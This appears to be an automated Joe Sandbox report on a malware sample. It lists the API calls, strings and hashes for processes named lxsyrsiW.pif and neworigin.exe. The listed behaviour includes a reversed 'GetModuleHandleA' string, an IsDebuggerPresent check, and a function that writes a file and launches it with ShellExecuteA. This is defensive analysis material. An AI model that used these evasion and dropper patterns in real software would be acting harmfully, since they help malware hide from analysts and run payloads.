Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: a878f3900cccd64de5308ee9aaf8aadb3b3f357fddaae283aa82baac2b0141d4
Instruction ID: b6d8c9521259de7803f4d7a9fc40ed7e7ecec6c10864a8417bfc18566e713f41
Opcode Fuzzy Hash: a878f3900cccd64de5308ee9aaf8aadb3b3f357fddaae283aa82baac2b0141d4
Instruction Fuzzy Hash: DA41B170FC41454B9721EA78889C6FEB6E7EB823C4B54F535B452E3384EA34E901CA25

Function 02E781CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Strings

KernelBASE, xrefs: 02E78205
AeldnaHeludoMteG, xrefs: 02E781E5

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: d4562c82cb34d9b6c4e9ed4a807c83bb1403658dae325fa821b488da78bd3c24
Instruction ID: 6bec548f636c082b896bff1f43282e64b2f6d49e05da86f2ce796f72fa39c06b
Opcode Fuzzy Hash: d4562c82cb34d9b6c4e9ed4a807c83bb1403658dae325fa821b488da78bd3c24
Instruction Fuzzy Hash: 1BF09670AC4744EFEB11EFA5EC0996AB7EDE76A740791D461F804C7610D670AE10DA24

Function 02E7F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02E7FAEB,UacInitialize,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,Initialize), ref: 02E7F6EE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E7F700

Strings

KernelBase, xrefs: 02E7F6E9
IsDebuggerPresent, xrefs: 02E7F6FA

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 5fbd4a30bbc4466749e077467ed74c74d9723bbc769f31329592959ed47d7ae3
Instruction ID: d3f57e9db3f52f2ddc3647753cd556274ca017315995e9406a9baa8b2e069fef
Opcode Fuzzy Hash: 5fbd4a30bbc4466749e077467ed74c74d9723bbc769f31329592959ed47d7ae3
Instruction Fuzzy Hash: A0D012A13F035019FE0073F42CC882D038C899457E320BF20F023C6492E5BA88155015

Function 02E6C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02E8D10B,00000000,02E8D11E), ref: 02E6C47A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02E6C48B

Strings

kernel32.dll, xrefs: 02E6C475
GetDiskFreeSpaceExA, xrefs: 02E6C485

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: b36d9e5c836fb7e5f4b0c3a8b39f10d9a29d783a4e35364407837c5fc30af3fe
Instruction ID: a2b497ad52e41d43a255480f1278b4ecc64ec5286380feaba7d862ac026defe4
Opcode Fuzzy Hash: b36d9e5c836fb7e5f4b0c3a8b39f10d9a29d783a4e35364407837c5fc30af3fe
Instruction Fuzzy Hash: 23D05EA0AC03556EE600EBB2688C63A269883083D8F68F827F48649500E7B658508F15

Function 02E6E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E6E297
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E6E2B3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E6E32A
VariantClear.OLEAUT32(?), ref: 02E6E353

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: da11094e24216840815a113e1987f401c443b39af0a13694a3297585e0749a71
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 42414D79A812198FCB62DB58CC98FE9B3BDAF49344F0891D5E54CE7251DA30AF808F50

Function 02E6AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E6AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E6AD7D
GetModuleFileNameA.KERNEL32(02E60000,?,00000105), ref: 02E6AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E6AE2E

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 1f9f4af902cdfc362617827507d63b9f162eeb9110f8fdc8efe0fc512a85612a
Instruction ID: 5ef519a6d160bb5cb4296cdad5145b653448c56c7d5833aa86167779a0bc562e
Opcode Fuzzy Hash: 1f9f4af902cdfc362617827507d63b9f162eeb9110f8fdc8efe0fc512a85612a
Instruction Fuzzy Hash: BA412B70EC02589BDB21DB68CC88BEAB7FDAB18384F4490E5A548E7341D774AF848F50

Function 02E6AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E6AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E6AD7D
GetModuleFileNameA.KERNEL32(02E60000,?,00000105), ref: 02E6AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E6AE2E

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: ed557031440ba8d0b898d3d919bdf1c35488626a5d30dca7878451e447b96384
Instruction ID: 23e464fc807e896f401009dec361d61b2836683f9332d508fe2b389d89f9a549
Opcode Fuzzy Hash: ed557031440ba8d0b898d3d919bdf1c35488626a5d30dca7878451e447b96384
Instruction Fuzzy Hash: 78413B70EC02589BDB21DB68CC88BEAB7FDAB18384F4494E5A548E7341D774AF848F50

Function 02E61C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80893facbb9b615517e3106bffa76b6793d2ff7c8d3e37742def23d59a280e6c
Instruction ID: 63f4aeecba29617b0708ee0439590bc57043be74691a1ca2c480751243efaa9c
Opcode Fuzzy Hash: 80893facbb9b615517e3106bffa76b6793d2ff7c8d3e37742def23d59a280e6c
Instruction Fuzzy Hash: 07A1FAA67D06004BD71AAA7D9C883BDB3C29BC53A9F18D27EF11DCF381DB64C9518650

Function 02E694EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02E695DA), ref: 02E69572
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02E695DA), ref: 02E69578

Strings

yyyy, xrefs: 02E6954D

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 1e1a19342784d5a7cb3f9a90b4749f4a28c2b86b27eea735ef5fe5a2d8d0c364
Instruction ID: 8f070cefb3e5f5259d8c0dd5da1395fc83cb95faeb82f3e195aad9e98aacb51d
Opcode Fuzzy Hash: 1e1a19342784d5a7cb3f9a90b4749f4a28c2b86b27eea735ef5fe5a2d8d0c364
Instruction Fuzzy Hash: F1217471AC01589FDB11DF64C845ABE73B9EF09750F4190A5F805E7291D730DE40CB65

Function 02E78338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E783C2), ref: 02E783A4

Strings

FlushInstructionCache, xrefs: 02E78351
Kernel32, xrefs: 02E78383

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: b5851a06c068e7e437e264b3fa8d41cfe112ae3c9dd2b2c99b68c9fd3c743551
Instruction ID: c176828ae27d72acd49d1fddd6d3a3a7203260fb4aa5d39ccb2edbb105fc1d7b
Opcode Fuzzy Hash: b5851a06c068e7e437e264b3fa8d41cfe112ae3c9dd2b2c99b68c9fd3c743551
Instruction Fuzzy Hash: 2F016D716C0304FFEB50EFA9DC4AF6A77EDE719B00F91E460B904D6680E670AD509B24

Function 02E7AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02E7AF58
IsBadWritePtr.KERNEL32(?,00000004), ref: 02E7AF88
IsBadReadPtr.KERNEL32(?,00000008), ref: 02E7AFA7
IsBadReadPtr.KERNEL32(?,00000004), ref: 02E7AFB3

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction ID: 932ac9ea27fb5274c7dc6a1a8d44fbc608759ae055551e13540fa783a88c96d8
Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction Fuzzy Hash: F021B4B26806199BDB24DF6ADC80BAE73AAEF40355F00D521FD14D7380D738E8118BA0

Analysis Process: lxsyrsiW.pifPID: 320, Parent PID: 5468COMMON

Execution Graph

Execution Coverage:	27.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	32
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 00401411, 00401414
D`:vD`:v, xrefs: 00401438, 0040143D

Memory Dump Source

Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
String ID: D`:vD`:v$D`:vD`:v
API String ID: 4108700736-3916433284
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Non-executed Functions

Function 004015D7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

Analysis Process: neworigin.exePID: 2140, Parent PID: 320COMMON

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	170
Total number of Limit Nodes:	25

Executed Functions

Function 06273178 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06273883
$]q, xrefs: 062738C4
$]q, xrefs: 062738A0
$]q, xrefs: 062738AC
$]q, xrefs: 062738D0
$]q, xrefs: 06273877

Memory Dump Source

Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: 02e6454209ad2223cab2677d5362bebbf43a5503c12590d3e1209059c379d8f4
Instruction ID: bda34fa8940d3b98ade97e8d4b33236e2ee6ae7cb56d6ef4dcd22a68d275a3b4
Opcode Fuzzy Hash: 02e6454209ad2223cab2677d5362bebbf43a5503c12590d3e1209059c379d8f4
Instruction Fuzzy Hash: BC321F31E2065ACBCB55EF79C89499DF7B2BFC9300F20C669D449A7254EF30A985CB81

Function 06277E78 Relevance: 3.0, Strings: 2, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0627841F
$]q, xrefs: 06278413

Memory Dump Source

Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
